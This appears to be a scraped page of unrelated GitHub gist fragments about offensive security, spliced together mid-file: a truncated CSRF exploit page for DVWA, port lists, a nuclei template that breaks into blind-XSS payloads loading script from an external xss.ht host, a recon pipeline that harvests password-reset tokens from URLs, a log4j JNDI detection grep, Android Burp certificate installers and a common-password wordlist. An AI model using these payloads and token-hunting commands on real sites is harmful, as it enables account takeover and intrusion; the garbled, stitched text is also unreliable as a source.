@StackZeroSec
StackZeroSec / csrf_dvwa_high.html
Created November 23, 2022 04:18
The CSRF exploit for DVWA with high level of security; it can be loaded thanks to the file upload vulnerability.
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<meta http-equiv='X-UA-Compatible' content='IE=edge'>
<title>Malicious File</title>
</head>
<body onload="change_password()">
@cihanmehmet
cihanmehmet / ports.md
Last active October 24, 2022 12:05
TCP PORTS List

Most Popular TCP/UDP Ports

https://nmap.org/book/port-scanning.html#most-popular-ports

20,21,22,23,25,53,67,68,69,80,110,111,123,135,137,138,139,143,161,162,443,445,500,514,520,631,993,995,1434,1723,1900,3306,3389,4500,5900,8080,49152

20 21 22 23 25 53 67 68 69 80 110 111 123 135 137 138 139 143 161 162 443 445 500 514 520 631 993 995 1434 1723 1900 3306 3389 4500 5900 8080 49152
id: swagger-ui
info:
  name: Swagger UI
  author: vidocsecurity
  severity: low
  description: Swagger UI exposes information about endpoints and sometimes it is vulnerable to XSS
  tags: swagger-ui,exposure
requests:
"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')
@R0X4R
R0X4R / tweets.txt
Created February 12, 2022 15:30
tweets collection
subfinder -d target.com -all -silent -t 10 | naabu -p "21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672" -silent -nc | httprobe -prefer-https | xargs -P 10 -I @ bash -c "echo @ | gau" 2> /dev/null | grep -E "password|password\-reset|reset\-token|token\=" | anew -q urls.txt
xargs -a urls.txt -P 5 -I @ bash -c "curl -ks -L \"@\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" | grep -iE \"enter password|new password|new\-password|confirm password|co
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active January 28, 2024 08:19
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders.

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@defparam
defparam / cluster.py
Last active December 15, 2023 10:19
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Author: Evan Custodio (@defparam)
#
# MIT License
# Copyright 2021 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
@cihanmehmet
cihanmehmet / android-burp-cert.sh
Last active May 29, 2023 12:14
Android 7-10 Burpsuite Certificate Install
#!/usr/bin/env bash
# Fetch Burp's CA certificate through the local proxy
# (alternative: open burp suite | Proxy > Options > CA Certificate > Export in DER format)
wget -e use_proxy=yes -e http_proxy=127.0.0.1:8080 http://burp/cert -O cacert.der
# Convert DER to PEM; the cp below reads cacert.pem, so this step must run
openssl x509 -inform DER -in cacert.der -out cacert.pem
# Android's system CA store expects the file to be named <subject_hash_old>.0
cp cacert.pem "$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1).0" #9a5ba575.0
#--------------------------------------------------------------------------------------------------------
adb root
adb remount
adb push 9a5ba575.0 /sdcard/
#--------------------------------------------------------------------------------------------------------
adb shell cp /sdcard/9a5ba575.0 /system/etc/security/cacerts/
@cihanmehmet
cihanmehmet / password-wordlist.txt
Created November 19, 2020 11:34
Password Wordlist(235k)
password
princess
123456
sunshine
princess1
abc123
jordan23
blessed1
Password1
password1
@dwisiswant0
dwisiswant0 / install_burp_cert.sh
Created November 13, 2020 18:45
10-line to Install BurpSuite Certificate on Android 7+
#!/bin/bash
curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*